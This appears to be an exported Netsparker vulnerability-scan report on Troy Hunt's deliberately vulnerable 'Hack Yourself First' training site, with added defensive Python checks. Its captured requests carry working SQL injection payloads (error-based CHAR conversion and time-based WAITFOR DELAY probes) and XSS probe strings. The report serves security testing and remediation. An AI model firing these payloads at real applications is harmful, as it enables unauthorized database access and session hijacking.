GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; } }</style></head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
MEDIUM: 1 total, 1 confirmed

8 Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.
Impact: If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the HTML form to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks, because the attacker controls the plaintext page on which the user types the password before the HTTPS submission ever happens.
This issue is important as it negates the use of SSL as a privacy protection barrier.
Actions to Take: 1. See the remedy for solution. 2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.
Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS. In practice this means redirecting every HTTP request to HTTPS and sending a Strict-Transport-Security header, so that the browser stops issuing plaintext requests to the site at all; the login page captured in 8.1 still mixes http:// and https:// links in its own navigation.
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
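The check behind this finding, as an added example that is not part of the Netsparker report or of the scanned site's code. It runs over a constructed HTML sample modelled on the /Account/Login page in 8.1: the page URL is http://, the login form posts to the https:// URL the report lists as "Form target action" and contains a password field, and a second form is a harmless search form (the markup and the /Supercar/Search action are constructed for the demo, not the page's real source). The function reports the report's two related findings separately, since a page that arrives over HTTP is the issue here even when the form action is HTTPS.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Added example, not part of the Netsparker report: constructed HTML modelled
# on the /Account/Login page in 8.1. The page was fetched over plaintext HTTP,
# the credential form posts to HTTPS; the search form is a harmless control.
PAGE_URL = "http://hackyourselffirst.troyhunt.com/Account/Login"
PAGE_HTML = """
<form action="https://hackyourselffirst.troyhunt.com/Account/Login" method="post">
  <input type="email" name="Email">
  <input type="password" name="Password">
  <input type="checkbox" name="RememberMe">
</form>
<form action="/Supercar/Search" method="get"><input type="text" name="q"></form>
"""


class FormCollector(HTMLParser):
    """Collect every <form> with its absolute action URL and its input types."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing or empty action posts back to the page itself.
            self.forms.append({"action": urljoin(self.page_url, a.get("action") or ""),
                               "inputs": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append((a.get("type") or "text").lower())


def audit_forms(page_url, page_html):
    """Return (action, issue) pairs for credential forms delivered insecurely.

    Two distinct issues, matching two findings in the report:
    - the page carrying a password field arrived over HTTP, so an active
      attacker can rewrite the form before the HTTPS submission happens
      ("critical form served over HTTP");
    - the form submits the password to an http:// action
      ("password transmitted over HTTP").
    """
    collector = FormCollector(page_url)
    collector.feed(page_html)
    page_is_plaintext = urlsplit(page_url).scheme.lower() == "http"
    findings = []
    for form in collector.forms:
        if "password" not in form["inputs"]:
            continue
        if page_is_plaintext:
            findings.append((form["action"], "critical form served over HTTP"))
        if urlsplit(form["action"]).scheme.lower() == "http":
            findings.append((form["action"], "password transmitted over HTTP"))
    return findings


if __name__ == "__main__":
    for action, issue in audit_forms(PAGE_URL, PAGE_HTML):
        print(f"{issue}: {action}")
```

For the sample above the result is a single "critical form served over HTTP" finding for the HTTPS login action; the same page fetched over https:// produces none, which is the state the remedy asks for.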
8.1 /Account/Login  CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Login
Form target action: https://hackyourselffirst.troyhunt.com/Account/Login

Request:
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><…
MEDIUM: 3 total

9 [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
Impact: There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking the user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks
Remedy: This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and the Microsoft Anti-cross-site scripting libraries. For the two instances below the input is reflected inside the JSON body of a 500 error, so the more fundamental fix is to stop echoing unhandled exception messages (and the raw SQL error they carry) to the client at all, and to send X-Content-Type-Options: nosniff so that a JSON response is never rendered as HTML.
Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet
External References: XSS Cheat Sheet; OWASP - cross-site scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote
http://hackyourselffirst.troyhunt.com/api/vote
Parameters:
Parameter   Type  Value
userId      POST  1
supercarId  POST  3
comments    POST  '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto MIME sniffing such as Internet Explorer.
Certainty:

Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.\r\nIncorrect syntax near '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…

9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt…
Parameters:
Parameter  Type  Value
nsextt     GET   "--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto MIME sniffing such as Internet Explorer.
Certainty:

Request:
GET /api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
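The manual confirmation the Notes above ask for, reduced to a decision rule, as an added example that is not part of the Netsparker report or of the scanned application. Given a response's headers and body it classifies a reflected probe by what a browser would do with it: verbatim in text/html is directly exploitable, verbatim in another type is only a MIME-sniffing concern unless X-Content-Type-Options: nosniff is present, and an entity-encoded reflection is not a vulnerability. The response used here is a constructed approximation of the /api/vote 500 in 9.1 (same headers, the probe echoed inside a JSON string of the SQL error), not the captured bytes.

```python
import html
import json

# Added example, not part of the Netsparker report. A constructed stand-in
# for the 9.1 response: JSON error body with the probe echoed back inside a
# string, and the headers the report shows (X-XSS-Protection: 0, no nosniff).
ACTIVE_MARKER = "<scRipt>netsparker(0x000437)</scRipt>"
PROBE = "'\"--></style></scRipt>" + ACTIVE_MARKER
JSON_500_HEADERS = {
    "Content-Type": "application/json; charset=utf-8",
    "X-XSS-Protection": "0",
}
JSON_500_BODY = json.dumps({
    "Message": "An error has occurred.",
    "ExceptionMessage": "Unclosed quotation mark after the character string '"
                        + PROBE + "')'.",
})


def assess_reflection(headers, body, marker=ACTIVE_MARKER):
    """Return a verdict code for a probe reflected in a response.

    'encoded'   - the active markup is not present verbatim (encoded/filtered)
    'html'      - verbatim in a text/html document: directly exploitable
    'nosniff'   - verbatim in a non-HTML type served with
                  X-Content-Type-Options: nosniff: not rendered as HTML
    'sniffable' - verbatim in a non-HTML type without nosniff: an old
                  MIME-sniffing browser may render it; confirm manually
    """
    lower = {k.lower(): v for k, v in headers.items()}
    content_type = lower.get("content-type", "").split(";")[0].strip().lower()
    nosniff = lower.get("x-content-type-options", "").strip().lower() == "nosniff"
    if marker not in body:
        return "encoded"
    if content_type == "text/html":
        return "html"
    return "nosniff" if nosniff else "sniffable"


def encode_for_html_body(untrusted):
    """The remedy side: entity-encode data before placing it in an HTML body."""
    return html.escape(untrusted, quote=True)


if __name__ == "__main__":
    print(assess_reflection(JSON_500_HEADERS, JSON_500_BODY))
    print(assess_reflection({**JSON_500_HEADERS, "X-Content-Type-Options": "nosniff"},
                            JSON_500_BODY))
```

The JSON encoder escapes the double quote but leaves `<scRipt>` intact, so the 9.1-style response comes back as 'sniffable'; adding nosniff alone turns it into 'nosniff', and entity-encoding the reflected value turns it into 'encoded'. Note the two are not interchangeable: nosniff protects a JSON endpoint, while encoding is what an HTML page needs.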
CRITICAL: 5 total, 5 confirmed

1 Blind SQL Injection
Netsparker identified a blind SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed us to identify and confirm the SQL injection. In the evidence below the probe is WAITFOR DELAY '0:0:25'; each injected request still returned 200 with the normal page, so the confirmation is the 25-second response latency rather than anything in the response body.
Impact: Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system
Actions to Take: 1. See the remedy for solution. 2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.
Remedy: A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation: There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.
External References: OWASP SQL injection; SQL injection Cheat sheet
Remedy References: MSDN - Protect From SQL injection in ASP.NET
Classification: OWASP 2010-A1, OWASP 2013-A1, PCI V2.0-6.5.1, PCI V3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
1.1 /Make/1  CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/1?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters:
Parameter  Type  Value
orderby    GET   1 WAITFOR DELAY '0:0:25'--

Request:
GET /Make/1?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:00:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Nissans - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…

1.2 /Supercar/Leaderboard  CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=1+WAITFOR+DELAY+%270%3a0%3a25%27-
Parameters:
Parameter  Type  Value
orderBy    GET   1 WAITFOR DELAY '0:0:25'--
asc        GET   false

Request:
GET /Supercar/Leaderboard?orderBy=1+WAITFOR+DELAY+%270%3a0%3a25%27--&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:16:09 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2885
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Supercar Leaderboard - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…

1.3 /Make/3  CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/3?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters:
Parameter  Type  Value
orderby    GET   1 WAITFOR DELAY '0:0:25'--

Request:
GET /Make/3?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:06:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Paganis - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…

1.4 /Make/2  CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters:
Parameter  Type  Value
orderby    GET   1 WAITFOR DELAY '0:0:25'--

Request:
